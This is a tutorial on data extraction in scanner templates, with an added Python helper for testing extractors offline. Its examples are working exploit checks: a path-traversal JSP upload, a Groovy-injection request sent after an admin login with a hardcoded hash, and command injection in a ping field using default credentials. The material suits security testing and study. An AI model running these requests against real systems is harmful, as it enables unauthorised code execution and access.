
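Data extraction

When a check involves multiple requests and a later request needs a value returned by an earlier one, extractors are typically used.

Regex extraction

Use a regex-type extractor to match and capture a key.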

regex

requests:
  - raw:
      - |
        GET /xxxxxx/xxxxCheck.jsp HTTP/1.1
        Host: {{Hostname}}
        Cookie: ecology_JSessionid=aaaLXuU7E1S7Z6FlnKU0x; JSESSIONID=aaaLXuU7E1S7Z6FlnKU0x

      - |
        POST /xxxxxx/xxxxUpgrade.jsp?token={{key}} HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 484
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqL5A4OGzXYd4PAHA

        ------WebKitFormBoundaryqL5A4OGzXYd4PAHA
        Content-Disposition: form-data; name="method"

        upgrade
        ------WebKitFormBoundaryqL5A4OGzXYd4PAHA
        Content-Disposition: form-data; name="upload"; filename="../../{{randstr_1}}.jsp"
        Content-Type: application/octet-stream

        <%@ page contentType="text/html;charset=UTF-8"%>  
        <%
        out.println("{{randstr_2}}" + "{{randstr_3}}");
        new java.io.File(application.getRealPath(request.getServletPath())).delete();
        %>
        ------WebKitFormBoundaryqL5A4OGzXYd4PAHA--

    extractors:
      - type: regex
        name: key
        part: body
        internal: true
        regex:
          - "[a-z0-9]{80,}"

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200'
          - 'contains(body_1, "timestamp") && contains(body_1, "status") && contains(body_1, "key")'
          - '!contains(body_2, "error") || !contains(body_2, "安全校验失败")'
        condition: and

JSON extraction

Use a json-type extractor to extract a uuid.

json

requests:
  - raw:
      - |
        PUT /zstack/v1/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 209

        {
        "logInByAccount": {
            "password": "b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86",
            "accountName": "admin"
        }
        }

      - |
        GET /zstack/v1/batch-queries?script=@groovy.transform.ASTTest(value=%7Bassert%20java.lang.Runtime.getRuntime()%7D)%20def%20x HTTP/1.1
        Host: {{Hostname}}
        Authorization: OAuth {{authuuid}}
        x-forwarded-for: 127.0.0.1
        x-originating-ip: 127.0.0.1
        x-remote-ip: 127.0.0.1
        x-remote-addr: 127.0.0.1

    extractors:
      - type: json
        name: authuuid
        part: body
        internal: true
        json:
          - '."inventory" | ."uuid"'
    # extractors:
    #   - type: regex
    #     name: authuuid
    #     part: body
    #     internal: true
    #     group: 1
    #     regex:
    #       - '"uuid":"\s*(.*?)\s*","'

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "inventory") && contains(body_1, "uuid")'
          - 'status_code_2 == 503 && contains(body_2, "SYS.1006")'
        condition: and

kval extraction

Use kval-type extractors to capture PHPSESSID and FWSESSID.

kval

requests:
  - raw:
      - |
        POST /index.php?c=user&a=ajax_save HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 49
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin&password=hicomadmin&language=zh-cn
      - |
        POST /index.php?c=maintain&a=ping HTTP/1.1
        Host: {{Hostname}}
        Cookie: FWSESSID={{fwsessid}}; PHPSESSID={{phpsessid}}; lange=zh-cn
        Content-Length: 52
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        interface=&destip=127.0.0.1%7Cecho+Mailgard%7Cmd5sum

    extractors:
      - type: kval
        name: fwsessid
        internal: true
        part: header
        kval:
          - FWSESSID
      - type: kval
        name: phpsessid
        internal: true
        part: header
        kval:
          - PHPSESSID

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code==200"
          - "contains((body_2), '2dba20b780cb70f9fea723ecfb6aad96')"
        condition: and
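
The following is an added example, not part of the original page or of any scanner's own code: it models the regex, json and kval extractor types in Python so a template author can check extractor patterns offline against a saved response before relying on them in a chained request. The sample responses are constructed, and the function names and the list-of-keys form of the JSON path are assumptions of this example.

```python
import json
import re
from http.cookies import SimpleCookie

# Constructed sample responses (not captured from any real system).
REGEX_BODY = '{"timestamp": 1700000000, "status": "ok", "key": "' + "a1b2c3d4e5" * 8 + '"}'
JSON_BODY = '{"inventory": {"uuid": "0123456789abcdef0123456789abcdef", "accountUuid": "x"}}'
JSON_COMPACT = '{"inventory":{"uuid":"0123456789abcdef0123456789abcdef","accountUuid":"x"}}'
KVAL_HEADERS = [
    ("Set-Cookie", "FWSESSID=fw-constructed-1; path=/"),
    ("Set-Cookie", "PHPSESSID=php-constructed-2; path=/; HttpOnly"),
]

def extract_regex(body, pattern, group=0):
    """First match of `pattern` in body; `group` selects a capture group."""
    m = re.search(pattern, body)
    return m.group(group) if m else None

def extract_json(body, path):
    """Walk a list of keys, like the jq filter '."inventory" | ."uuid"'."""
    try:
        node = json.loads(body)
    except ValueError:
        return None
    for key in path:
        if not isinstance(node, dict) or key not in node:
            return None
        node = node[key]
    return node

def extract_kval(headers, name):
    """Look up a cookie by name across all Set-Cookie response headers."""
    for header, value in headers:
        if header.lower() == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            if name in jar:
                return jar[name].value
    return None

def render(template, variables):
    """Fill {{name}} placeholders; fail loudly when an extractor found nothing."""
    def sub(m):
        value = variables.get(m.group(1))
        if value is None:
            raise KeyError(f"extractor '{m.group(1)}' produced no value")
        return str(value)
    return re.sub(r"\{\{(\w+)\}\}", sub, template)
```

Running the commented-out regex alternative for the uuid against `JSON_BODY` returns nothing because of the space after the colon, while the JSON path works on both bodies.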